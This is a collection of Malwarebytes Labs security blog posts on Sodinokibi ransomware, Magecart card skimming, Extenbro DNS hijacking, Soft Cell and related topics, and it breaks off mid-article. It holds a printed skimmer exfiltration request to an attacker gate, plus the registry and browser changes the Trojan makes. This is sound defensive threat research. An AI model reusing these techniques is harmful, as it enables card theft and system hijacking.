Threat Spotlight: Sodinokibi ransomware attempts to fill GandCrab void

Sodinokibi, also known as Sodin and REvil, is hardly six months old, yet it has quickly become a topic of discussion among cybersecurity professionals because of its apparent connection with the infamous-but-now-defunct GandCrab ransomware.

On May 31, the threat actors behind GandCrab formally announced their retirement, detailing their plan to cease selling and advertising GandCrab in a dark web forum post.

“We are leaving for a well-deserved retirement,” a GandCrab RaaS administrator announced. (Courtesy of security researcher Damian on Twitter)

While many may have heaved sighs of relief, some expressed skepticism over whether the GandCrab team would truly put behind their widely successful money-making scheme. What followed was bleak anticipation of another ransomware operation—or a re-emergence of the group peddling new wares—taking over to fill the hole GandCrab left behind.

In a way, they were all right.

Enter Sodinokibi

Putting a spin on an old product is a concept not unheard of in legitimate business circles. Often, spinning involves creating a new name for the product, some tweaking on its existing features, and finding new influencers—”affiliates” in the case of ransomware-as-a-service operations—to use (and market) the product. In addition, threat actors would initially limit the new product’s availability and follow with a brand-new marketing campaign—all without touching the product standard. In hindsight, it seems the GandCrab team has taken this route.

A month before the GandCrab retirement announcement, Cisco Talos researchers released information about a new ransomware called Sodinokibi. Attackers manually infected the target server after exploiting a zero-day vulnerability in its Oracle WebLogic application.

To date, six versions of Sodinokibi has been seen in the wild.

Sodinokibi versions, from the earliest (v1.0a), which was discovered on April 23, to the latest (v1.3), which was discovered July 8.

Based on our telemetry, Sodinokibi has spread wide to both businesses and consumers since GandCrab’s exit.

Business and consumer detection trends for Sodin/REvil, which Malwarebytes detects as Ransom.Sodinokibi.

Sodinokibi infection vectors

Like GandCrab, the Sodinokibi ransomware-as-a-service (RaaS) follows an affiliate revenue system, which allows other cybercriminals to spread it through several vectors:

  • Active exploitation of a vulnerability in Oracle WebLogic, officially named CVE-2019-2725
  • Malicious spam or phishing campaigns with links or attachments
  • Malvertising campaigns that lead to the RIG exploit kit, an avenue that GandCrab used before
  • Compromised or infiltrated managed service providers (MSPs), which are third-party companies that remotely manage the IT infrastructure and/or end-user systems of other companies, to push the ransomware en-masse. This is done by accessing networks via a remote desktop protocol (RDP) and then using the MSP console to deploy the ransomware.

Although affiliates used these tactics to push GandCrab, too, many cybercriminals—nation-state actors included—have done the same to push their own malware campaigns.

Symptoms of Sodinokibi infection

Systems infected with Sodinokibi ransomware show the following symptoms:

Changed desktop wallpaper. Like any other ransomware, Sodinokibi changes the desktop wallpaper of affected systems into a notice, informing users that their files have been encrypted. The wallpaper has a blue background, as you can partially see from the screenshot above, with the text:

All of your files are encrypted!
Find {5-8 alpha-numeric characters}-readme.txt and follow instructions

Presence of ransomware note. The {5-8 alpha-numeric characters}-readme.txt file it’s referring to is the ransom note that comes with every ransomware attack. In Sodinokibi’s case, it looks like this:

The note contains instructions on how affected users can go about paying the ransom and how the decryption process works.

Screenshot of the TOR-only accessible website Sodinokibi victims were told to visit to make their payments

Encrypted files with a 5–8 character extension name. Sodinokibi encrypts certain files on local drives with the Salsa20 encryption algorithm, with each file renamed to include a pre-generated, pseudo-random alpha-numeric extension that’s five to eight characters long.

The extension name and character string included in the ransom note file name are the same. For example, if Sodinokibi has encrypted an image file and renamed it to paris2017.r4nd01, its corresponding the ransom note with have the file name r4nd01-readme.txt.

Sodinokibi looks for files that are mostly media- and programming-related, with the following extensions to encrypt:

  • .jpg
  • .jpeg
  • .raw
  • .tif
  • .png
  • .bmp
  • .3dm
  • .max
  • .accdb
  • .db
  • .mdb
  • .dwg
  • .dxf
  • .cpp
  • .cs
  • .h
  • .php
  • .asp
  • .rb
  • .java
  • .aaf
  • .aep
  • .aepx
  • .plb
  • .prel
  • .aet
  • .ppj
  • .gif
  • .psd

Deleted shadow copy backups and disabled Windows Startup Repair tool. Shadow copy (also known as Volume Snapshot Service, Volume Shadow Copy Service, or VSS) and Startup Repair are technologies inherent in the Windows OS. The former is “a snapshot of a volume that duplicates all of the data that is held on that volume at one well-defined instant in time,” according to Windows Dev Center. The latter is a recovery tool used to troubleshoot certain Windows problems.

Deleting shadow copies prevents users from restoring from backup when they find their files are encrypted by ransomware. Disabling the Startup Repair tool prevents users from attempting to fix system errors that may have been caused by a ransomware infection.

Other tricks up Sodinokibi’s sleeve

Ransomware doesn’t normally take advantage of zero-day vulnerabilities in their attacks—but Sodinokibi is not your average ransomware. It takes advantage of an elevated privilege zero-day vulnerability in the Win32k component file in Windows.

Designated as CVE-2018-8453, this flaw can grant Sodinokibi administrator access to the endpoints it infects. This means that it can conduct the same tasks as administrators on systems, such as disabling security software and other features that were meant to protect the system from malware.

CVE-2018-8453 was the same vulnerability that the FruitArmor APT exploited in its malware campaign last year.

New variants of Sodinokibi have also been found to use “Heaven’s Gate,” an old evasion technique used to execute 64-bit code on a 32-bit process, which allows malware to run without getting detected. We touched on this technique in early 2018 when we dissected an interesting cryptominer we captured in the wild.

Protect your system from Sodinokibi

Malwarebytes tracks Sodinokibi campaigns and protects users with a multi-layered approach using signature-less detection, nipping the attack in the bud before the infection chain even begins.

To mitigate, we also recommend IT administrators to do the following:

  • Deny public IPs access to RDP port 3389.
  • Replace your company’s ConnectWise ManagedITSync integration plug-in with the latest version before reconnecting your VSA server to the Internet.
  • Block SMB port 445. In fact, it’s sound security practice to block all unused ports.
  • Apply the latest Microsoft update packages.
  • In this vein, make sure all software on endpoints is up-to-date.
  • Limit the use of system administration tools to IT personnel or employees who need access only.
  • Disable macro on Microsoft Office products.
  • Regularly inform employees about threats that might be geared toward the organization’s industry or the company itself with reminders on how to handle suspicious emails, such as avoiding clicking on links or opening attachments if they’re not sure of the source.
  • Apply attachment filtering to email messages.
  • Regularly create multiple backups of data, preferably to devices that aren’t connected to the Internet.

Indicators of compromise (IOCs)

File hashes:

  • e713658b666ff04c9863ebecb458f174
  • bf9359046c4f5c24de0a9de28bbabd14
  • 177a571d7c6a6e4592c60a78b574fe0e

Stay safe, everyone!

The post Threat Spotlight: Sodinokibi ransomware attempts to fill GandCrab void appeared first on Malwarebytes Labs.

No man’s land: How a Magecart group is running a web skimming operation from a war zone

Our Threat Intelligence team has been monitoring the activities of a number of threat actors involved in the theft of credit card data. Often referred to under the Magecart moniker, these groups use simple pieces of JavaScript code (skimmers) typically injected into compromised e-commerce websites to steal data typed by unaware shoppers as they make their purchase.

During the course of an investigation into one campaign, we noticed the threat actors had taken some additional precautions to avoid disruption or takedowns. As such, we decided to have a deeper look into the bulletproof techniques and services offered by their hosting company.

What we found is an ideal breeding ground where criminals can operate with total impunity from law enforcement or actions from the security community.

The setup

Using servers hosted in battle-scarred Luhansk (also known as Lugansk), Ukraine, Magecart operators are able to operate outside the long arm of the law to conduct their web-skimming business, collecting a slew of information in addition to credit card details before it is all sent to “exfiltration gates.” Those web servers are set up to receive the stolen data so that the cards can be processed and eventually resold in underground forums.

We will take you through analysis of the skimmer, exfiltration gate, and hosting servers to show how this Magecart group operates, and which measures we are taking to protect our customers.

Skimmer analysis

The skimmer is injected into compromised Magento sites and trying to pass itself for Google Analytics (google-anaiytic[.]com), a domain previously associated with the VisionDirect data breach.

Each hacked online store has its own skimmer located in a specific directory named after the site’s domain name. We also discovered a tar.gz archive perhaps left behind by mistake containing the usernames and passwords needed to login into hundreds of Magento sites. These are the same sites that have been injected with this skimmer.

Looking for additional OSINT, we were able to find a PHP backdoor that we believe is being used on those hacked sites. It includes several additional shell scripts and perhaps skimmers as well (snif1.txt):

In the next step of our analysis, we will be looking at the exfiltration gate used to send the stolen data back to the criminals. This is an essential part that defines every skimmer and can help us better understand their backend infrastructure.

Exfiltration gate

A closer look at the skimmer code reveals the exfiltration gate (google.ssl.lnfo[.]cc), which is another Google lookalike.

The stolen data is Base64 encoded and sent to the exfiltration server via a GET request that looks like this:

GET /fonts.googleapis/savePing/?hash=udHJ5IjoiVVMiLCJsb2dpbjpndWVzdCXN0Iiw{trimmed}

The crooks will receive the data as a JSON file where each field contains the victim’s personal information in clear text:

The primary target here is the credit card information that can be immediately monetized. However, as seen above, skimmers can also collect much more data, which unlike requesting a new credit card, is much more problematic to deal with. Indeed, names, addresses, phone numbers, and emails are extremely valuable data points for the purposes of identity theft or spear phishing attacks.

Panel and bulletproof hosting

A closer look at the exfiltration gate reveals the login panel for this skimmer kit. It’s worth noting that both google.ssl.lnfo[.]cc and lnfo[.]cc redirect to the same login page.

lnfo[.]cc is utilizing name services provided by 1984 Hosting, an Iceland-based hosting provider that “will always go the extra mile to protect our customers’ civil rights, including the freedom of expression, the freedom of the press, the right to anonymity and privacy.” It’s quite likely the threat actors may be taking advantage of it.

The corresponding hosting server (176.119.1[.]92) is located in Luhansk (also known as Lugansk), Ukraine.

A little bit of research on this city shows it is the capital of the unrecognized Luhansk People’s Republic (LPR), which declared its independence from Ukraine following the 2014 revolution ignited by the conflict between pro-European and pro-Russian supporters. It is part of a region also known as Donbass that has been the theater for an intense and ongoing war that has cost thousands of lives.

Amid this chaos, opportunists are offering up bulletproof hosting services for “grey projects” safe from the reach of European and American law enforcement. This is the case of bproof[.]host at 176.119.1[.]89, which advertises bulletproof IT services with VPS and dedicated servers in a private data center.

A host ripe with malware, skimmers, phishing domains

Choosing the ASN AS58271 “FOP Gubina Lubov Petrivna” located in Luhansk is no coincidence for the Magecart group behind this skimmer. In fact, on the same ASN at 176.119.1[.]70 is also another skimmer (xn--google-analytcs-xpb[.]com) using an internationalized domain name (IDN) that ties back to that same exfiltration gate.

In addition, that ASN is a hotspot for IDN-based phishing, in particular around cryptocurrency assets:

Bulletproof hosting services have long been a staple of cybercrime. For instance, the infamous Russian Business Network (RBN) ran a variety of malicious activities for a number of years.

Due to the very nature of such hosts, takedown operations are difficult. It’s not simply a case of a provider turning a blind eye on shady operations, but rather it is the core of their business model.

To protect our users against these threats, we are blocking all the domains and IP addresses we can find associated with skimmers and malware in general. We are also reporting the compromised Magento stores to their respective registrars/hosts.

Indicators of Compromise

Skimmers (hosts)
google-anaiytic[.]com (176.119.1[.]72)
xn--google-analytcs-xpb[.]com (176.119.1[.]70)

Skimmers (exfiltration gate/panel)
google.ssl.lnfo[.]cc (176.119.1[.]92)

Skimmers (JavaScript)

The post No man’s land: How a Magecart group is running a web skimming operation from a war zone appeared first on Malwarebytes Labs.

Compromising vital infrastructure: problems in education security continue

The educational system and many of its elements are targets for cybercriminals on a regular basis. While education is a fundamental human right recognized by the United Nations, the financial means of many schools and other entities in the global educational system are often limited.

These limited budgets often result in weak or less-than-adequate protection against cyberthreats. Unfortunately, organizations in this industry are forced to economize and cut the costs of security.

Record keepers

Schools by nature have a lot of personal data on record—not only about their students, but in most cases, they also have records of the parents, legal guardians, and other caretakers of the children they educate. And the nature of the data—grades, health information, and social security numbers, for example—makes them extremely valuable for phishing and other social engineering attacks.

Ransomware can also have a devastating effect on educational institutions, as some of the information, like grades for example, may not be recorded anywhere else. If they are destroyed or held for ransom without the availability of backups, the results can be disastrous.

Special circumstances

Organizations in the education industry have some special circumstances to deal with when trying to protect their data and networks:

  • Many schools use special software that allows their students to log in both on premise and remotely so they can view their grades and homework assignments. These applications occasionally get hacked by students.
  • Growing networks enlarge the attack surface. Modern education requires children of young ages to learn computer skills, so many students are connected to the institution’s network at once.
  • If a tech-savvy student wants a day off, claims that he couldn’t access his homework assignments, or simply wants to brag, what’s to stop him from organizing or paying for a DDoS attack? Kids will be kids.
  • Schools often also harbor a mix of IoT and BYOD devices, which each come with their own potential problems. Some schools have noticed a spike in malware detections after holiday breaks, when infected devices get introduced back into the school environment.

The sensitive nature of the data and having an open platform for students at the same time creates a difficult situation for many educational institutions. After all, it is easy to kick in a door that is already half open— especially if there is a wealth of personally identifiable Information (PII) behind it.

The current situation

An analysis in December 2018 by SecurityScorecard ranked education as the worst in cybersecurity of 17 major industries. According to the study, the main areas of cybersecurity weaknesses in education are application security, endpoint security, patching cadence, and network security.

In our 2019 State of Malware report, we found education to be consistently in the top 10 industries targeted by cybercriminals. Looking only at Trojans and more sophisticated ransomware attacks, schools were even higher on the list, ranking as number one and number two, respectively.

So, it shouldn’t come as a surprise that according to a 2016 study entitled: The Rising Face of Cyber Crime: Ransomware, 13 percent of education organizations fall victim to ransomware attacks.

Malware strikes hard

Like many other organizations, educational institutions are under attack by the most active malware families, such as Emotet, TrickBot, and Ryuk, which wreaked havoc on organizations for the better part of the 2018–2019 school year.

Last May, the Coventry school district in Ohio had to send home its 2,000 students and close its doors for the duration of one day. The cause was probably a TrickBot infection, but the FBI is still busy with an ongoing investigation.

In February 2019, the Sylvan Union School District in California discovered a malware attack that made staff and teachers lose their connection to cloud-based data, networks, and educational platforms. Reportedly, they had to spend US$475,700 to clean up their networks.

On May 13, 2019, attackers infected the computer network of Oklahoma City Public Schools with ransomware, forcing the school district to shut down its network.

But it’s not just malware that educational institutions need to worry about. Scott County Schools in Kentucky paid US$3.7 million out to a phishing scam that posed as one of their vendors.

Unfortunately, that’s money many school districts, especially those in impoverished communities, cannot afford to pay out. So when can they do to get ahead of malware attacks before valuable data and funding fly out the bus window?

Recommended reading: What K–12 schools need to shore up cybersecurity


Given the complex situation and sensitive data most educational organizations have to deal with, there are a host of measures that should be taken to lower the risk of a costly incident. Recognizing that many schools must divert public funding to core curriculum, our recommendations represent a baseline level of protection districts should strive toward with limited resources.

  • Separate educational and organizational networks, with grades and curriculum in one place, and personal data in another. By using this infrastructure, it will be harder for cybercriminals to access personal data by using leaked or breached student and teacher accounts.
  • DDoS protection. DDoS attacks are so cheap ($10/hour) nowadays, that anyone with a grudge can have an unprotected server taken down for a few days without spending a fortune. The possible scope of DDoS attacks has been increased significantly, now that attackers have started using Memcached-enabled servers. To put a stop to outrageously-large DDoS attacks, those servers should not be Internet-facing.
  • Educate staff and students about the dangers they are facing and the possible consequences of not paying enough attention. Teachers can absorb cybersecurity education into reading comprehension lessons, and staff could benefit from awareness training during professional development days.
  • Lay out clear and concise regulations for the use of devices that belong to the organization and the way private devices are allowed to be used on the grounds.
  • Backups should be up-to-date and easy to deploy. Ransomware demands are high and even when you pay them, there is always the chance the decryption may fail—or never existed in the first place.
  • Investing in layered protection may seem costly, but compared to falling victim to malware or fraud, the investments is worth it.

In fact, all of these measures will cost money and we realize that will need to come out of a tight budget. But funding, or the lack thereof, can not be an excuse for weak security. Cybercrime is one of the biggest chunks of the modern economy. And guess who’s paying for most of that? Those who didn’t invest enough in security.

What a strange paradox that one of the best weapons against cybercrime is education, but that organizations in education have the biggest problems with security. We at Malwarebytes, with the help of educational leaders, aim to change that.

Stay safe, everyone!

The post Compromising vital infrastructure: problems in education security continue appeared first on Malwarebytes Labs.

Hi, honey. It’s mom. My phone is acting funny again.

Whether it’s setting up access to a Netflix account on a smart TV or enabling personal email on an iPhone, some people—of all ages—have a hard time figuring out user-friendly technology. However, often times it’s older generations that have to turn to their progenitors for everything from uploading pictures to the cloud to deciding whether it’s safe to open an attachment.

Despite results from a 2018 study from the Pew Research Center, which found that there has been “significant growth in tech adoption in recent years among older generations—particularly Gen Xers and Baby Boomers,” Millennials and Gen Zs field many “how do I?” technology questions from their aging parents.

While older generations are embracing technology, such as smart phones and smart TVs, the constant need to update “can be difficult for seniors to keep up with,” according to Senior Living. “Often seniors need help from caregivers or cell phone technicians to understand new features to their devices.”

The frustration from older users over rapidly-evolving new technology, updates to software, and a laundry list of security best practices to keep track of—like needing 27 different passwords—can lead to tech and security fatigue, which causes users to bury their heads in the sand instead of having to keep up with it all. What’s easier, then, is calling up a younger friend or family member for help.

That’s all well and good, but do younger generations always know the right thing to do? And are they sick of serving as the family IT guy? How can disparate generations reconcile their relationship with technology and with each other while still staying safe?

My phone is acting weird

When seniors experience user challenges, they most often turn to the Internet or their families for tech support, according to 2019 Link-Age Connect Technology Study. Nicolas Poggi, who works for a software security firm in Santiago, Chile, agreed, explaining that his 54-year-old mother is constantly reaching out with questions about her phone.

“I think the main thing that keeps coming up is the fear that everything has a virus in it,” Poggi said. “I usually get a call or a sneaky message from Mom saying, ‘Hey, I think my phone has a virus or something. It’s acting odd, can you give me a hand?'”

Sometimes the problem is one of misconfigurations. “She’s misconfigured half of her settings by accident and the other half trying to fix the initial misconfigurations,” Poggi said, adding that his greatest technology concerns for his mother are privacy and security.

Yes, privacy and security are important concerns for most technology users, but Linkage Connect explained that when it comes to the elderly, “the biggest barriers that keep them from adopting new technology today are the complexity, understanding it all, the cost, and having no easy way to learn it.”

Scammers target older users

Verizon’s 2019 Data Breach Report found that 32 percent of data breaches involved phishing, where cybercriminals send emails pretending to be from reputable companies to coax people into revealing personal information, such as passwords and credit card numbers. Not surprisingly, young people are concerned that their aging parents could easily fall victim to a phish or some other type of fraudulent scam, especially because scammers are keen to target older users, whom they believe to be more vulnerable.

When asked about her perceived ability to detect fraud and scams, Poggi’s mom said, “I think there are obvious ones, like the email ones or those images that promise to make you a millionaire. Aside from that, I don’t really know what other types of scams are out there. It worries me that I don’t know what to look out for. I know how to keep my social media private, but I don’t really know who is looking at what or where.”

Poggi agrees with his mother’s assessment, but worries that the areas where she lacks awareness could lead to compromise.

“I don’t think their generation adopted technology in the way we have,” said Poggi. “They are way behind with best practices. Basic things like password hygiene, phishing, fake websites, fake offers, still get to them. Still, they seem to have adopted enough technology to make for an awfully dangerous combination: a lack of security plus online banking plus social media.”

I love my phone! I hate my phone!

Older generations are increasingly becoming major consumers of connected devices. In fact, 94 percent of Americans over the age of 50 use technology to stay connected with their friends and family members, according to the 2019 Tech and the 50+ Survey published by AARP.

Yet, many in the 50+ age group have a love-hate relationship with technology. The Linkage Connect survey covered a wide swath of participant ages—nearly half a century, actually. Some said they had no use for technology. Others said they couldn’t imagine life without it. Most respondents appreciated being able to use technology but found the learning curve frustrating.

“Finding time to learn to use and to fix technology is the biggest problem,” said one woman in the 75–79 age range.

A woman nearly 10 years her senior said, “I find it frustrating when setting up a new electronic device such as a printer, computer, phone, etc. Instructions are supposed to be simple, but there always seems to be something missed. Need a person to walk me through it.”

While others noted their reliance on family to help them navigate the complexities of their connected devices, one woman in her sixties said, “I find it interesting, but the advancements come so rapidly, it is hard to keep up. And the expense is ridiculous.”

Though technology admittedly makes some aspects of life simpler, another 75–79 year old woman said, “At times, I feel that if I have to learn one more thing I will scream, but it is keeping me current with the world.”

Convenience, affordability, and simplicity

According to AARP, technologies targeting, “the health, wellness, safety, and vitality of adults 50-plus are proliferating.” Technology innovators obviously crunched the numbers from the Census Bureau in preparation for January’s CES 2019 in Las Vegas, where many of the devices introduced for older generations ranged from awesome to odd.

As people age, however, they want to make things simpler. Simplicity and ease of use should be the goal of technologies and devices that are designed for older generations. The Linkage Connect study noted that, “With the 50+ population representing approximately 115 million in the United States alone today and the expectation for that number to reach 132 million by 2030 (from the US Census Bureau), it is now more important than ever to understand the older adult consumer.”

No one wants to fumble through learning how to use a connected device. If it’s too challenging, it’s useless. Asking for help can be embarrassing for older generations who have to turn to their children or grandchildren to learn how to use a new gadget, which is one reason why the American Society on Aging advised, “It is imperative that in addition to making technology more intuitive for older adults, training older adults in how to use technology must be a national priority.”

What’s important to remember is that education needs to be accessible and personal—at any age. In order to enable adoption that improves the lives of elders, manufacturers, and younger helpers, need to meet them where they are.

“They want to learn ‘hands on’ with others. Teaching older adults how to use these devices, in the manner in which they want to learn, could prove to benefit them as they age,” the Linkage Connect study said.

Older adults who feel overwhelmed should feel free to take the initiative to ask for help. And younger family members or friends should be patient and take a beat to not only fix the problem, but walk people through it. In the end, both generations can benefit from the extra security awareness practice.

The post Hi, honey. It’s mom. My phone is acting funny again. appeared first on Malwarebytes Labs.

Meet Extenbro, a new DNS-changer Trojan protecting adware

Recently, we uncovered a new DNS-changer called Extenbro that comes with an adware bundler. These DNS-changers block access to security-related sites, so the adware victims can’t download and install security software to get rid of the pests.

From our viewpoint, this might be like sending in an elephant to save the mosquito, but the threat actors behind this attack have been known to use aggressive tactics in the past. What do they care if they open up your machine to all kinds of threats by disallowing you access to security sites and blocking any existing security software from getting updates? They just want to serve you adware.

Unfortunately, we have seen this kind of behavior before. But since this one uses a few fancy tricks, we’ll give you a quick overview of what it does and how you can get rid of it. For those just looking for a quick fix, there is a removal guide on our forums.

Infection vector

We have noticed the Extenbro Trojan is delivered on systems by a bundler that is detected by Malwarebytes as Trojan.IStartSurf.


First and foremost, the Trojan changes the DNS settings of the infected system so it won’t be able to reach any security vendors’ sites.

Advanced DNS

New for this one is that you have to access the Advanced DNS tab to find out that it has added four DNS servers rather than the usual two. Where people might be inclined to change the two that are visible, use the Advanced button and look at the DNS tab: It would cause them to leave the additional two behind.

Task Scheduler

Should you manage to correct the offending DNS servers and reboot the system before taking further measures, you will find that the DNS settings re-appear after a reboot. This is because of a randomly-named Scheduled Task that looks similar to this:

Scheduled Task

The location of the folder and the switches for the command seem to be fixed, but the folder name and file name are random.

Root certificate

The Trojan also adds a certificate to the set of Windows Root certificates.

new certificate

Using the method outlined in the blog post Learning PowerShell: some basic commands, I established that the certificate has no “Friendly Name” and is supposedly registered to abose[at]reddit[dot]com.

Disables IPV6

By changing the registry value DisabledComponents under the key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services\TCPIP6\Parameters and setting the value to “FF”, the Trojan disables IPV6 to force the system to use the new DNS servers.


The malware also makes a change in the Firefox user.js file and sets the security.enterprise_roots.enabled setting to true, which Configures Firefox to use the Windows Certificate Store where the newly-added root certificate was added.


Removal instructions

Some of the changes that this malware makes could already be in place, if they are the user’s preferred settings. So feel free to skip the steps that you are not comfortable with.

What really needs to be done so you can download a removal tool or update you existing security software is to restore the DNS servers to what they were—or, if you don’t know the previous settings, to something safe. Most ISPs have the preferred DNS servers listed in their installation instructions or on their website. That is the first place to look. If you can’t find them there, you can use the DNS servers provided by OpenDNS. You can find instructions for many Operating Systems on their site.

An extra step needs to be taken when you are in this screen:

General DNS settings

Make sure to click on Advanced…and select the DNS tab to find the extra two DNS servers that we mentioned earlier. Remove those before you change the two shown on the screen to your preferred ones.

Now, you should be able to visit security sites again. Follow the remaining instructions below:

  • To get to your security sites, you may need a restart of the browser. Do NOT reboot your system or the DNS servers might be changed for the worse again by the Scheduled Task that belongs to the Trojan. If your existing solution does not pick up on the malware, download  Malwarebytes to your desktop.
  • Double-click mb3-setup-consumer-{version}.exe and follow the prompts to install the program.
  • Then click Finish.
  • Once the program has fully updated, select Scan Now on the Dashboard. Or select the Threat Scan from the Scan menu.
  • If another update of the definitions is available, it will be implemented before the rest of the scanning procedure.
  • When the scan is complete, make sure that All Threats are selected, and click Remove Selected.
  • Restart your computer when prompted to do so.
  • This procedure should take care of the Scheduled Task and the Root certificate.
  • If you want to undo the change that makes FireFox adhere to the Windows certificates, you can open Firefox and type about:config in the address bar. Then read and accept the “risk” and search for security.enterprise_roots.enabled. The default settings is false. You can change the setting by selecting the line and right clicking it to get a menu. Clicking Toggle changes the value back and forth between True and False. Close the about:config tab when you are done.

Should you need further help, feel free to reach out to us on the forums or by contacting our support department.


DNS servers:


SHA256 b2a28e9abb04a5926d53850623b1f3c6738169b27847e90c55119f2836c17006

Root certificate:


Stay safe, everyone!

The post Meet Extenbro, a new DNS-changer Trojan protecting adware appeared first on Malwarebytes Labs.

A week in security (July 8 – 14)

Last week on Malwarebytes Labs, we looked at ways to send your sensitive information in a secure fashion, examined some tactics in incident response land, and explored federal data privacy law. We also looked at how security tools can turn against you, and took a deep dive into the rather fiendish Soft Cell attack.

Other cybersecurity news

  • The UK government backs facial recognition tech: The controversial trials received the backing of the British government’s home secretary. (Source: BBC)
  • Who watches the Watchmen: British police officer misuses database. (Source: The Register)
  • Zoom zero-day lurches into view: Researchers report a bug which leaves Mac users susceptible to webcam hijacks. (Source: ThreatPost)
  • Listen closely: Google contractors can listen to Google Home audio clips. (Source: Sophos’s Naked Security Blog)
  • Agent Smith on the prowl: Android malware capable of replacing code with its own malicious wares found on more than 25 million devices. (Source: The Verge)
  • TrickBot is what’s hot: The timeless “classic” returns with a few new tricks up its sleeve, including some cunning spam antics. (Source: TechCrunch)
  • Pale Moon rising: Old versions of the popular browser found to be infected with malware. (Source: ZDNet)
  • Phish attacks are never far: A recent study revealed that one in 99 emails are classified as phishing. Here’s a good look at costs and some additional statistics. (Source: Small Business Trends)
  • Beware of whales: Ship operators are warned by the US coast guard to be on the lookout for targeted spear phishing attempts. (Source: Computing News)
  • Amazon is a Prime target: Beware of smart phishing scams looking to bait those looking for a bargain on Prime Day. (Source: Wired)

Stay safe, everyone!

The post A week in security (July 8 – 14) appeared first on Malwarebytes Labs.

Cellular networks under fire from Soft Cell attacks

We place a lot of trust in our mobile experience, given they’re one of the most constant companions we have. Huge reams of data, tied to a device we always carry with us, with said device frequently offering additional built-in app functionality. An astonishing wealth of information, for anyone bold enough to try and take it.

Security firm Cybereason uncovered an astonishing attack dubbed “Operation soft cell” haunting at least ten cellular networks based around the globe. Over the course of seven years, they went after all manner of detailed information on just 20 to 30 targets, feeding it back to base and building up an amazingly detailed picture of their daily dealings.

What happened here?

The compromise, which the researchers have given a high probability of being a nation-state attack, went to elaborate lengths to nab their high value targets. Attackers first gained a foothold by targeting a web-connected server and making use of an exploit to gain access. A shell would then be placed to enable further unauthorised activity.

In this particular case, a modified version of the well-known China Chopper was deployed to carry out specific tasks. It’s quite flexible, able to run on multiple server platforms. It’s also quite old, dating back several years. I guess there’s no tunes quite like the classics.

Thanks to China Chopper and a variety of alternative compromise tools, the attackers would make use of credentials from the first machine to dig deeper in the network. Well-worn RATs like PoisonIvy were used to ensure continued access on compromised devices.

Eventually, they’d gain control of the Domain Controller and at that point,  it’s essentially game over for the targeted organisation.

Groundhog Day

It appears the criminals reused various techniques to work their way around the various cellular networks, with little resistance. Talk about “If it ain’t broke, don’t fix it.” So total was their ownership of certain organisations, they were able to set up VPN services to enable quick, persistent access on hijacked networks instead of taking the much slower route and connecting their way through multiple compromised servers.

If they were worried about being caught in the act, they certainly didn’t show it. In fact, from reading the main report it seems in cases where there was some pushback, they simply looped back around and tried again till they succeeded, attacking in waves staggered over a period of months.

The Crown Jewels

Most of the time, attacks on web-facing servers result in an email from Have I been pwned and you see which bits of personal information have been fired across the web this time. Not here, however—it was never going to end with a username/password dump.

The attackers plundered cellular networks, gained access to pretty much everything you could think of. In cases where the target was fully compromised, all username/passwords were grabbed, along with billing information and various smatterings of personal data.

However, the big prize here wasn’t being able to hurl all of this onto a Pastebin or upload it to social media as a free-for-all; nothing so bland. It was, instead, being able to sit on both this data quietly alongside hundreds of gigabytes of call detail records. This is, as you’ll see, a bad thing.

Call detail records: What are they?

Good question.

Call detail records are all about metadata. They won’t give you the contents of the call itself, but what they will give you is pretty much everything else. They’re useful for a variety of things: billing disputes, law enforcement inquiries, tracking people down, bill generation, call volumes/handling for businesses and much more. Not only do they avoid recordings of conversations, they also steer clear of specific location information.

Nonetheless, patterns of behaviour are easy to figure out. A typical CDR could include:

  • Caller
  • Recipient
  • Start/end time of call
  • Billing number
  • Voice/SMS/other
  • A specific number used to identify the record in question
  • How the call entered/exited the exchange

If you’re looking to target specific individuals, then this data over time is an incredible resource for an attacker to get hold of. Some may prefer the old spear phish/malware attachment type scenario, but by going after the target directly, it’s quite possible someone’s going to find out. Where targets are high value, they’ll almost certainly have additional security measures in place. For example, journalists who cover human rights abuses in dangerous parts of the world will often work with organisations who keep an eye out for potential attacks.

This method, aimed at slowly digging around behind the scenes and out of view from whoever happens to be using those networks, is much sneakier. Depending on how things pan out, it’s entirely possible they’d never even know they’d been compromised by proxy in the first place.

Hidden in plain sight

With methods such as this, the people behind the malware daisy chain have an amazing slice of access to the individual with no direct specific risk. Everything at that point comes down to how well the cellular network is locked down, how good their security is, how on the ball their incident response team happens to be, and so on.

If (say) they failed to spot numerous attacks, left vulnerable servers online, missed telltale signs that something is amiss, let well-known RATs like PoisonIvy dance across their network, allowed the hackers to set up a bunch of VPN nodes…well, you can see where I’m going with this.

Where I’m going is several years later and a large slice of “Oh dear.”


Well, first thing’s first: don’t panic. It’s worth noting there isn’t any additional verification (yet) outside the initial threat report. Something bad has clearly happened here, but as to how severe it is, we’ll leave that to others to debate.

Whether this was pulled off by a high-level nation state approved group of attackers or a random collection of bored people in an apartment, one way or another those cell networks really had a number done on them. The impact to the individuals caught by this is the same, and one assumes they’ve been informed and taken appropriate action. We can only hope the cellular networks impacted have now taken appropriate measures and shored up their defences.

The post Cellular networks under fire from Soft Cell attacks appeared first on Malwarebytes Labs.

Caution: Misuse of security tools can turn against you

We have a saying in Greece: “They assigned the wolf to watch over the sheep.”

In a security context, this is a word of caution about making sure the tools we use to keep our information private don’t actually cause the data leaks themselves. In this article, I will be talking about some cases that I have come across in which security tools have leaked data they were intended to secure.

The VirusTotal problem

VirusTotal (VT) is a multi-scanner in which an individual researcher is free to upload any file they believe is suspicious. They can then view results from many antivirus (AV) products as to whether or not the file is considered malware. While this is an amazing service which I am certain everyone in the infosec world uses regularly, its usage needs to be carefully thought over.

What some people don’t realize is that every file you submit to VirusTotal gets saved on VT’s servers and is fully searchable. By using an internal VT tool called Malware RetroHunting, malware hunters have the ability to search for text and binary patterns in order to find malware similar to ones that he may be analyzing or tracking.

This is a great feature, but as you can imagine, just as someone could search for [insert malicious string of your choice], they could just as easily search for “Account Number:”, which might result in loads of documents containing such data. It is important to bring awareness to this fact so that people can properly use this tool without risking their private data.

I will go through a few cases showing the misuse of VirusTotal to serve as a warning for users who might be thinking about using either second rate/ unofficial tools or adopting practices built off of VT.

Case 1: The no AV argument

I far too often hear people saying something like this: “I don’t need an AntiVirus. I send files to VT for free when they look suspicious.”

I think it should be quite obvious why this method is flawed. If you submit all documents you receive to VT, then you run the risk of leaking private information, as stated above. Now, if you exclude scanning of documents from specific “trusted” addresses (in order to not leak confidential data), then you run the risk of getting a malware phished to you from a spoofed contact. Needless to say, this is not a safe way to keep yourself protected.

Case 2: API usage

